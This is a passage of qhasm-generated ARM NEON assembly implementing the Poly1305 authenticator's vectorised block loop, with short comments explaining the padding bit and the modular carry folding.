# qhasm: r2[0,1] += x4[0] unsigned* 5z34[0]; r2[2,3] += x4[1] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x4=reg128#11%bot,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r2=q13,<x4=d20,<5z34=d10
vmlal.u32 q13,d20,d10
# qhasm: r0 = r0[0,1]c01[1]r0[2]
# asm 1: vext.32 <r0=reg128#8%top,<c01=reg128#1%bot,<r0=reg128#8%top,#1
# asm 2: vext.32 <r0=d15,<c01=d0,<r0=d15,#1
vext.32 d15,d0,d15,#1
# qhasm: r1[0,1] = c23[0]<<6; r1[2,3] = c23[1]<<6
# asm 1: vshll.u32 >r1=reg128#15,<c23=reg128#2%bot,#6
# asm 2: vshll.u32 >r1=q14,<c23=d2,#6
vshll.u32 q14,d2,#6
# qhasm: r1[0,1] += x01[0] unsigned* z12[0]; r1[2,3] += x01[1] unsigned* z12[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x01=reg128#9%bot,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r1=q14,<x01=d16,<z12=d4
vmlal.u32 q14,d16,d4
# qhasm: r1[0,1] += x01[2] unsigned* z0[0]; r1[2,3] += x01[3] unsigned* z0[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x01=reg128#9%top,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r1=q14,<x01=d17,<z0=d6
vmlal.u32 q14,d17,d6
# qhasm: r1[0,1] += x23[0] unsigned* 5z34[2]; r1[2,3] += x23[1] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r1=reg128#15,<x23=reg128#10%bot,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r1=q14,<x23=d18,<5z34=d11
vmlal.u32 q14,d18,d11
# qhasm: r1[0,1] += x23[2] unsigned* 5z34[0]; r1[2,3] += x23[3] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x23=reg128#10%top,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r1=q14,<x23=d19,<5z34=d10
vmlal.u32 q14,d19,d10
# qhasm: ptr = &5z12_stack
# asm 1: lea >ptr=int32#3,<5z12_stack=stack128#10
# asm 2: lea >ptr=r2,<5z12_stack=[sp,#144]
add r2,sp,#144
# qhasm: 5z12 aligned= mem128[ptr]
# asm 1: vld1.8 {>5z12=reg128#1%bot->5z12=reg128#1%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5z12=d0->5z12=d1},[<ptr=r2,: 128]
vld1.8 {d0-d1},[r2,: 128]
# qhasm: r1[0,1] += x4[0] unsigned* 5z12[2]; r1[2,3] += x4[1] unsigned* 5z12[3]
# asm 1: vmlal.u32 <r1=reg128#15,<x4=reg128#11%bot,<5z12=reg128#1%top
# asm 2: vmlal.u32 <r1=q14,<x4=d20,<5z12=d1
vmlal.u32 q14,d20,d1
# qhasm: d23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>d23=reg128#2%bot->d23=reg128#2%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>d23=d2->d23=d3},[<input_2=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#2,#32
# asm 2: add >input_2=r1,<input_2=r1,#32
add r1,r1,#32
# qhasm: r0[0,1] += x4[0] unsigned* 5z12[0]; r0[2,3] += x4[1] unsigned* 5z12[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x4=reg128#11%bot,<5z12=reg128#1%bot
# asm 2: vmlal.u32 <r0=q7,<x4=d20,<5z12=d0
vmlal.u32 q7,d20,d0
# qhasm: r0[0,1] += x23[0] unsigned* 5z34[0]; r0[2,3] += x23[1] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x23=reg128#10%bot,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r0=q7,<x23=d18,<5z34=d10
vmlal.u32 q7,d18,d10
# qhasm: d01 d23 = d01[0] d23[0] d01[1] d23[1]
# asm 1: vswp <d23=reg128#2%bot,<d01=reg128#12%top
# asm 2: vswp <d23=d2,<d01=d23
vswp d2,d23
# qhasm: r0[0,1] += x23[2] unsigned* 5z12[2]; r0[2,3] += x23[3] unsigned* 5z12[3]
# asm 1: vmlal.u32 <r0=reg128#8,<x23=reg128#10%top,<5z12=reg128#1%top
# asm 2: vmlal.u32 <r0=q7,<x23=d19,<5z12=d1
vmlal.u32 q7,d19,d1
# qhasm: r0[0,1] += x01[0] unsigned* z0[0]; r0[2,3] += x01[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x01=reg128#9%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r0=q7,<x01=d16,<z0=d6
vmlal.u32 q7,d16,d6
# qhasm: new mid
# qhasm: 2x v4 = d23 unsigned>> 40
# asm 1: vshr.u64 >v4=reg128#4,<d23=reg128#2,#40
# asm 2: vshr.u64 >v4=q3,<d23=q1,#40
vshr.u64 q3,q1,#40
# qhasm: mid = d01[1]d23[0] mid[2,3]
# asm 1: vext.32 <mid=reg128#1%bot,<d01=reg128#12%bot,<d23=reg128#2%bot,#1
# asm 2: vext.32 <mid=d0,<d01=d22,<d23=d2,#1
vext.32 d0,d22,d2,#1
# qhasm: new v23
# qhasm: v23[2] = d23[0,1] unsigned>> 14; v23[3] = d23[2,3] unsigned>> 14
# asm 1: vshrn.u64 <v23=reg128#10%top,<d23=reg128#2,#14
# asm 2: vshrn.u64 <v23=d19,<d23=q1,#14
vshrn.u64 d19,q1,#14
# qhasm: mid = mid[0,1] d01[3]d23[2]
# asm 1: vext.32 <mid=reg128#1%top,<d01=reg128#12%top,<d23=reg128#2%top,#1
# asm 2: vext.32 <mid=d1,<d01=d23,<d23=d3,#1
vext.32 d1,d23,d3,#1
# qhasm: new v01
# qhasm: v01[2] = d01[0,1] unsigned>> 26; v01[3] = d01[2,3] unsigned>> 26
# asm 1: vshrn.u64 <v01=reg128#11%top,<d01=reg128#12,#26
# asm 2: vshrn.u64 <v01=d21,<d01=q11,#26
vshrn.u64 d21,q11,#26
# qhasm: v01 = d01[1]d01[0] v01[2,3]
# asm 1: vext.32 <v01=reg128#11%bot,<d01=reg128#12%bot,<d01=reg128#12%bot,#1
# asm 2: vext.32 <v01=d20,<d01=d22,<d01=d22,#1
vext.32 d20,d22,d22,#1
# qhasm: r0[0,1] += x01[2] unsigned* 5z34[2]; r0[2,3] += x01[3] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r0=reg128#8,<x01=reg128#9%top,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r0=q7,<x01=d17,<5z34=d11
vmlal.u32 q7,d17,d11
# qhasm: v01 = v01[1]d01[2] v01[2,3]
# asm 1: vext.32 <v01=reg128#11%bot,<v01=reg128#11%bot,<d01=reg128#12%top,#1
# asm 2: vext.32 <v01=d20,<v01=d20,<d01=d23,#1
vext.32 d20,d20,d23,#1
# qhasm: v23[0] = mid[0,1] unsigned>> 20; v23[1] = mid[2,3] unsigned>> 20
# asm 1: vshrn.u64 <v23=reg128#10%bot,<mid=reg128#1,#20
# asm 2: vshrn.u64 <v23=d18,<mid=q0,#20
vshrn.u64 d18,q0,#20
# qhasm: v4 = v4[0]v4[2]v4[1]v4[3]
# asm 1: vtrn.32 <v4=reg128#4%bot,<v4=reg128#4%top
# asm 2: vtrn.32 <v4=d6,<v4=d7
vtrn.32 d6,d7
# qhasm: 4x v01 &= 0x03ffffff
# asm 1: vand.i32 <v01=reg128#11,#0x03ffffff
# asm 2: vand.i32 <v01=q10,#0x03ffffff
vand.i32 q10,#0x03ffffff
# qhasm: ptr = &y34_stack
# asm 1: lea >ptr=int32#3,<y34_stack=stack128#4
# asm 2: lea >ptr=r2,<y34_stack=[sp,#48]
add r2,sp,#48
# qhasm: y34 aligned= mem128[ptr]
# asm 1: vld1.8 {>y34=reg128#3%bot->y34=reg128#3%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y34=d4->y34=d5},[<ptr=r2,: 128]
vld1.8 {d4-d5},[r2,: 128]
# qhasm: 4x v23 &= 0x03ffffff
# asm 1: vand.i32 <v23=reg128#10,#0x03ffffff
# asm 2: vand.i32 <v23=q9,#0x03ffffff
vand.i32 q9,#0x03ffffff
# qhasm: ptr = &y12_stack
# asm 1: lea >ptr=int32#3,<y12_stack=stack128#3
# asm 2: lea >ptr=r2,<y12_stack=[sp,#32]
add r2,sp,#32
# qhasm: y12 aligned= mem128[ptr]
# asm 1: vld1.8 {>y12=reg128#2%bot->y12=reg128#2%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y12=d2->y12=d3},[<ptr=r2,: 128]
vld1.8 {d2-d3},[r2,: 128]
# qhasm: 4x v4 |= 0x01000000
# asm 1: vorr.i32 <v4=reg128#4,#0x01000000
# asm 2: vorr.i32 <v4=q3,#0x01000000
vorr.i32 q3,#0x01000000
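# The OR above plants the Poly1305 padding bit: the top limb holds
# bits 104 and up of each block, so 2^24 here is the 2^128 bit
# appended to every full 16-byte block.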
# qhasm: ptr = &y0_stack
# asm 1: lea >ptr=int32#3,<y0_stack=stack128#2
# asm 2: lea >ptr=r2,<y0_stack=[sp,#16]
add r2,sp,#16
# qhasm: y0 aligned= mem128[ptr]
# asm 1: vld1.8 {>y0=reg128#1%bot->y0=reg128#1%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y0=d0->y0=d1},[<ptr=r2,: 128]
vld1.8 {d0-d1},[r2,: 128]
# qhasm: r4[0,1] += v01[0] unsigned* y34[2]; r4[2,3] += v01[1] unsigned* y34[3]
# asm 1: vmlal.u32 <r4=reg128#16,<v01=reg128#11%bot,<y34=reg128#3%top
# asm 2: vmlal.u32 <r4=q15,<v01=d20,<y34=d5
vmlal.u32 q15,d20,d5
# qhasm: r4[0,1] += v01[2] unsigned* y34[0]; r4[2,3] += v01[3] unsigned* y34[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v01=reg128#11%top,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r4=q15,<v01=d21,<y34=d4
vmlal.u32 q15,d21,d4
# qhasm: r4[0,1] += v23[0] unsigned* y12[2]; r4[2,3] += v23[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r4=reg128#16,<v23=reg128#10%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r4=q15,<v23=d18,<y12=d3
vmlal.u32 q15,d18,d3
# qhasm: r4[0,1] += v23[2] unsigned* y12[0]; r4[2,3] += v23[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v23=reg128#10%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r4=q15,<v23=d19,<y12=d2
vmlal.u32 q15,d19,d2
# qhasm: r4[0,1] += v4[0] unsigned* y0[0]; r4[2,3] += v4[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v4=reg128#4%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r4=q15,<v4=d6,<y0=d0
vmlal.u32 q15,d6,d0
# qhasm: ptr = &5y34_stack
# asm 1: lea >ptr=int32#3,<5y34_stack=stack128#6
# asm 2: lea >ptr=r2,<5y34_stack=[sp,#80]
add r2,sp,#80
# qhasm: 5y34 aligned= mem128[ptr]
# asm 1: vld1.8 {>5y34=reg128#13%bot->5y34=reg128#13%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5y34=d24->5y34=d25},[<ptr=r2,: 128]
vld1.8 {d24-d25},[r2,: 128]
# qhasm: r3[0,1] += v01[0] unsigned* y34[0]; r3[2,3] += v01[1] unsigned* y34[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v01=reg128#11%bot,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r3=q4,<v01=d20,<y34=d4
vmlal.u32 q4,d20,d4
# qhasm: r3[0,1] += v01[2] unsigned* y12[2]; r3[2,3] += v01[3] unsigned* y12[3]
# asm 1: vmlal.u32 <r3=reg128#5,<v01=reg128#11%top,<y12=reg128#2%top
# asm 2: vmlal.u32 <r3=q4,<v01=d21,<y12=d3
vmlal.u32 q4,d21,d3
# qhasm: r3[0,1] += v23[0] unsigned* y12[0]; r3[2,3] += v23[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v23=reg128#10%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r3=q4,<v23=d18,<y12=d2
vmlal.u32 q4,d18,d2
# qhasm: r3[0,1] += v23[2] unsigned* y0[0]; r3[2,3] += v23[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v23=reg128#10%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r3=q4,<v23=d19,<y0=d0
vmlal.u32 q4,d19,d0
# qhasm: r3[0,1] += v4[0] unsigned* 5y34[2]; r3[2,3] += v4[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r3=reg128#5,<v4=reg128#4%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r3=q4,<v4=d6,<5y34=d25
vmlal.u32 q4,d6,d25
# qhasm: ptr = &5y12_stack
# asm 1: lea >ptr=int32#3,<5y12_stack=stack128#5
# asm 2: lea >ptr=r2,<5y12_stack=[sp,#64]
add r2,sp,#64
# qhasm: 5y12 aligned= mem128[ptr]
# asm 1: vld1.8 {>5y12=reg128#12%bot->5y12=reg128#12%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5y12=d22->5y12=d23},[<ptr=r2,: 128]
vld1.8 {d22-d23},[r2,: 128]
# qhasm: r0[0,1] += v4[0] unsigned* 5y12[0]; r0[2,3] += v4[1] unsigned* 5y12[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v4=reg128#4%bot,<5y12=reg128#12%bot
# asm 2: vmlal.u32 <r0=q7,<v4=d6,<5y12=d22
vmlal.u32 q7,d6,d22
# qhasm: r0[0,1] += v23[0] unsigned* 5y34[0]; r0[2,3] += v23[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v23=reg128#10%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r0=q7,<v23=d18,<5y34=d24
vmlal.u32 q7,d18,d24
# qhasm: r0[0,1] += v23[2] unsigned* 5y12[2]; r0[2,3] += v23[3] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r0=reg128#8,<v23=reg128#10%top,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r0=q7,<v23=d19,<5y12=d23
vmlal.u32 q7,d19,d23
# qhasm: r0[0,1] += v01[0] unsigned* y0[0]; r0[2,3] += v01[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v01=reg128#11%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r0=q7,<v01=d20,<y0=d0
vmlal.u32 q7,d20,d0
# qhasm: r0[0,1] += v01[2] unsigned* 5y34[2]; r0[2,3] += v01[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r0=reg128#8,<v01=reg128#11%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r0=q7,<v01=d21,<5y34=d25
vmlal.u32 q7,d21,d25
# qhasm: r1[0,1] += v01[0] unsigned* y12[0]; r1[2,3] += v01[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v01=reg128#11%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r1=q14,<v01=d20,<y12=d2
vmlal.u32 q14,d20,d2
# qhasm: r1[0,1] += v01[2] unsigned* y0[0]; r1[2,3] += v01[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v01=reg128#11%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r1=q14,<v01=d21,<y0=d0
vmlal.u32 q14,d21,d0
# qhasm: r1[0,1] += v23[0] unsigned* 5y34[2]; r1[2,3] += v23[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r1=reg128#15,<v23=reg128#10%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r1=q14,<v23=d18,<5y34=d25
vmlal.u32 q14,d18,d25
# qhasm: r1[0,1] += v23[2] unsigned* 5y34[0]; r1[2,3] += v23[3] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v23=reg128#10%top,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r1=q14,<v23=d19,<5y34=d24
vmlal.u32 q14,d19,d24
# qhasm: r1[0,1] += v4[0] unsigned* 5y12[2]; r1[2,3] += v4[1] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r1=reg128#15,<v4=reg128#4%bot,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r1=q14,<v4=d6,<5y12=d23
vmlal.u32 q14,d6,d23
# qhasm: r2[0,1] += v01[0] unsigned* y12[2]; r2[2,3] += v01[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r2=reg128#14,<v01=reg128#11%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r2=q13,<v01=d20,<y12=d3
vmlal.u32 q13,d20,d3
# qhasm: r2[0,1] += v01[2] unsigned* y12[0]; r2[2,3] += v01[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v01=reg128#11%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r2=q13,<v01=d21,<y12=d2
vmlal.u32 q13,d21,d2
# qhasm: r2[0,1] += v23[0] unsigned* y0[0]; r2[2,3] += v23[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v23=reg128#10%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r2=q13,<v23=d18,<y0=d0
vmlal.u32 q13,d18,d0
# qhasm: r2[0,1] += v23[2] unsigned* 5y34[2]; r2[2,3] += v23[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r2=reg128#14,<v23=reg128#10%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r2=q13,<v23=d19,<5y34=d25
vmlal.u32 q13,d19,d25
# qhasm: r2[0,1] += v4[0] unsigned* 5y34[0]; r2[2,3] += v4[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v4=reg128#4%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r2=q13,<v4=d6,<5y34=d24
vmlal.u32 q13,d6,d24
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#3,<two24=stack128#1
# asm 2: lea >ptr=r2,<two24=[sp,#0]
add r2,sp,#0
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#4,<r0=reg128#8,#26
# asm 2: vshr.u64 >t1=q3,<r0=q7,#26
vshr.u64 q3,q7,#26
# qhasm: len -= 64
# asm 1: sub >len=int32#4,<len=int32#4,#64
# asm 2: sub >len=r3,<len=r3,#64
sub r3,r3,#64
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#6,<r0=reg128#8,<mask=reg128#7
# asm 2: vand >r0=q5,<r0=q7,<mask=q6
vand q5,q7,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#15,<t1=reg128#4
# asm 2: vadd.i64 >r1=q3,<r1=q14,<t1=q3
vadd.i64 q3,q14,q3
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#8,<r3=reg128#5,#26
# asm 2: vshr.u64 >t4=q7,<r3=q4,#26
vshr.u64 q7,q4,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#5,<r3=reg128#5,<mask=reg128#7
# asm 2: vand >r3=q4,<r3=q4,<mask=q6
vand q4,q4,q6
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#8,<r4=reg128#16,<t4=reg128#8
# asm 2: vadd.i64 >x4=q7,<r4=q15,<t4=q7
vadd.i64 q7,q15,q7
# qhasm: r4 aligned= mem128[ptr]
# asm 1: vld1.8 {>r4=reg128#16%bot->r4=reg128#16%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>r4=d30->r4=d31},[<ptr=r2,: 128]
vld1.8 {d30-d31},[r2,: 128]
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#9,<r1=reg128#4,#26
# asm 2: vshr.u64 >t2=q8,<r1=q3,#26
vshr.u64 q8,q3,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#4,<r1=reg128#4,<mask=reg128#7
# asm 2: vand >r1=q3,<r1=q3,<mask=q6
vand q3,q3,q6
# qhasm: 2x t0 = x4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#10,<x4=reg128#8,#26
# asm 2: vshr.u64 >t0=q9,<x4=q7,#26
vshr.u64 q9,q7,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#9,<r2=reg128#14,<t2=reg128#9
# asm 2: vadd.i64 >r2=q8,<r2=q13,<t2=q8
vadd.i64 q8,q13,q8
# qhasm: x4 &= mask
# asm 1: vand >x4=reg128#11,<x4=reg128#8,<mask=reg128#7
# asm 2: vand >x4=q10,<x4=q7,<mask=q6
vand q10,q7,q6
# qhasm: 2x x01 = r0 + t0
# asm 1: vadd.i64 >x01=reg128#6,<r0=reg128#6,<t0=reg128#10
# asm 2: vadd.i64 >x01=q5,<r0=q5,<t0=q9
vadd.i64 q5,q5,q9
# qhasm: r0 aligned= mem128[ptr]
# asm 1: vld1.8 {>r0=reg128#8%bot->r0=reg128#8%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>r0=d14->r0=d15},[<ptr=r2,: 128]
vld1.8 {d14-d15},[r2,: 128]
# qhasm: ptr = &z34_stack
# asm 1: lea >ptr=int32#3,<z34_stack=stack128#9
# asm 2: lea >ptr=r2,<z34_stack=[sp,#128]
add r2,sp,#128
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#10,<t0=reg128#10,#2
# asm 2: vshl.i64 >t0=q9,<t0=q9,#2
vshl.i64 q9,q9,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#14,<r2=reg128#9,#26
# asm 2: vshr.u64 >t3=q13,<r2=q8,#26
vshr.u64 q13,q8,#26
# qhasm: 2x x01 += t0
# asm 1: vadd.i64 >x01=reg128#15,<x01=reg128#6,<t0=reg128#10
# asm 2: vadd.i64 >x01=q14,<x01=q5,<t0=q9
vadd.i64 q14,q5,q9
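# Carry folding: t0 is the carry out of the top limb; x01 has now
# picked up t0 + 4*t0 = 5*t0, because 2^130 == 5 (mod 2^130 - 5).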
# qhasm: z34 aligned= mem128[ptr]
# asm 1: vld1.8 {>z34=reg128#6%bot->z34=reg128#6%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z34=d10->z34=d11},[<ptr=r2,: 128]
vld1.8 {d10-d11},[r2,: 128]
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#9,<mask=reg128#7
# asm 2: vand >x23=q9,<r2=q8,<mask=q6
vand q9,q8,q6
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#5,<r3=reg128#5,<t3=reg128#14
# asm 2: vadd.i64 >r3=q4,<r3=q4,<t3=q13
vadd.i64 q4,q4,q13
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#2,#32
# asm 2: add >input_2=r1,<input_2=r1,#32
add r1,r1,#32
# qhasm: 2x t1 = x01 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#14,<x01=reg128#15,#26
# asm 2: vshr.u64 >t1=q13,<x01=q14,#26
vshr.u64 q13,q14,#26
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: x01 = x01 & mask
# asm 1: vand >x01=reg128#9,<x01=reg128#15,<mask=reg128#7
# asm 2: vand >x01=q8,<x01=q14,<mask=q6
vand q8,q14,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#4,<t1=reg128#14
# asm 2: vadd.i64 >r1=q3,<r1=q3,<t1=q13
vadd.i64 q3,q3,q13
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#14,<r3=reg128#5,#26
# asm 2: vshr.u64 >t4=q13,<r3=q4,#26
vshr.u64 q13,q4,#26
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#9%bot,<x01=reg128#9%top
# asm 2: vtrn.32 <x01=d16,<x01=d17
vtrn.32 d16,d17
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#5,<r3=reg128#5,<mask=reg128#7
# asm 2: vand >r3=q4,<r3=q4,<mask=q6
vand q4,q4,q6
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#4%bot,<r1=reg128#4%top
# asm 2: vtrn.32 <r1=d6,<r1=d7
vtrn.32 d6,d7
# qhasm: 2x x4 += t4
# asm 1: vadd.i64 >x4=reg128#11,<x4=reg128#11,<t4=reg128#14
# asm 2: vadd.i64 >x4=q10,<x4=q10,<t4=q13
vadd.i64 q10,q10,q13
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#5%bot,<r3=reg128#5%top
# asm 2: vtrn.32 <r3=d8,<r3=d9
vtrn.32 d8,d9
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#9%top,<r1=reg128#4%bot,<r1=reg128#4%bot,#0
# asm 2: vext.32 <x01=d17,<r1=d6,<r1=d6,#0
vext.32 d17,d6,d6,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#5%bot,<r3=reg128#5%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d8,<r3=d8,#0
vext.32 d19,d8,d8,#0
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#11%bot,<x4=reg128#11%top
# asm 2: vtrn.32 <x4=d20,<x4=d21
vtrn.32 d20,d21
# qhasm: unsigned>? len - 64
# asm 1: cmp <len=int32#4,#64
# asm 2: cmp <len=r3,#64
cmp r3,#64
# qhasm: goto mainloop2 if unsigned>
bhi ._mainloop2
# qhasm: input_2 -= 32
# asm 1: sub >input_2=int32#3,<input_2=int32#2,#32
# asm 2: sub >input_2=r2,<input_2=r1,#32
sub r2,r1,#32
# qhasm: below64bytes:
._below64bytes:
# qhasm: unsigned>? len - 32
# asm 1: cmp <len=int32#4,#32
# asm 2: cmp <len=r3,#32
cmp r3,#32
# qhasm: goto end if !unsigned>
bls ._end
# qhasm: mainloop:
._mainloop:
# qhasm: new r0
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#2,<two24=stack128#1
# asm 2: lea >ptr=r1,<two24=[sp,#0]
add r1,sp,#0
# qhasm: r4 aligned= mem128[ptr]
# asm 1: vld1.8 {>r4=reg128#5%bot->r4=reg128#5%top},[<ptr=int32#2,: 128]
# asm 2: vld1.8 {>r4=d8->r4=d9},[<ptr=r1,: 128]
vld1.8 {d8-d9},[r1,: 128]
# qhasm: u4 aligned= mem128[ptr]
# asm 1: vld1.8 {>u4=reg128#6%bot->u4=reg128#6%top},[<ptr=int32#2,: 128]
# asm 2: vld1.8 {>u4=d10->u4=d11},[<ptr=r1,: 128]
vld1.8 {d10-d11},[r1,: 128]
# qhasm: c01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c01=reg128#8%bot->c01=reg128#8%top},[<input_2=int32#3]!
# asm 2: vld1.8 {>c01=d14->c01=d15},[<input_2=r2]!
vld1.8 {d14-d15},[r2]!
# qhasm: r4[0,1] += x01[0] unsigned* y34[2]; r4[2,3] += x01[1] unsigned* y34[3]
# asm 1: vmlal.u32 <r4=reg128#5,<x01=reg128#9%bot,<y34=reg128#3%top
# asm 2: vmlal.u32 <r4=q4,<x01=d16,<y34=d5
vmlal.u32 q4,d16,d5
# qhasm: c23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c23=reg128#14%bot->c23=reg128#14%top},[<input_2=int32#3]!
# asm 2: vld1.8 {>c23=d26->c23=d27},[<input_2=r2]!
vld1.8 {d26-d27},[r2]!
# qhasm: r4[0,1] += x01[2] unsigned* y34[0]; r4[2,3] += x01[3] unsigned* y34[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x01=reg128#9%top,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r4=q4,<x01=d17,<y34=d4
vmlal.u32 q4,d17,d4
# qhasm: r0 = u4[1]c01[0]r0[2,3]
# asm 1: vext.32 <r0=reg128#4%bot,<u4=reg128#6%bot,<c01=reg128#8%bot,#1
# asm 2: vext.32 <r0=d6,<u4=d10,<c01=d14,#1
vext.32 d6,d10,d14,#1
# qhasm: r4[0,1] += x23[0] unsigned* y12[2]; r4[2,3] += x23[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r4=reg128#5,<x23=reg128#10%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r4=q4,<x23=d18,<y12=d3
vmlal.u32 q4,d18,d3
# qhasm: r0 = r0[0,1]u4[1]c23[0]
# asm 1: vext.32 <r0=reg128#4%top,<u4=reg128#6%bot,<c23=reg128#14%bot,#1
# asm 2: vext.32 <r0=d7,<u4=d10,<c23=d26,#1
vext.32 d7,d10,d26,#1
# qhasm: r4[0,1] += x23[2] unsigned* y12[0]; r4[2,3] += x23[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x23=reg128#10%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r4=q4,<x23=d19,<y12=d2
vmlal.u32 q4,d19,d2
# qhasm: r0 = r0[1]r0[0]r0[3]r0[2]
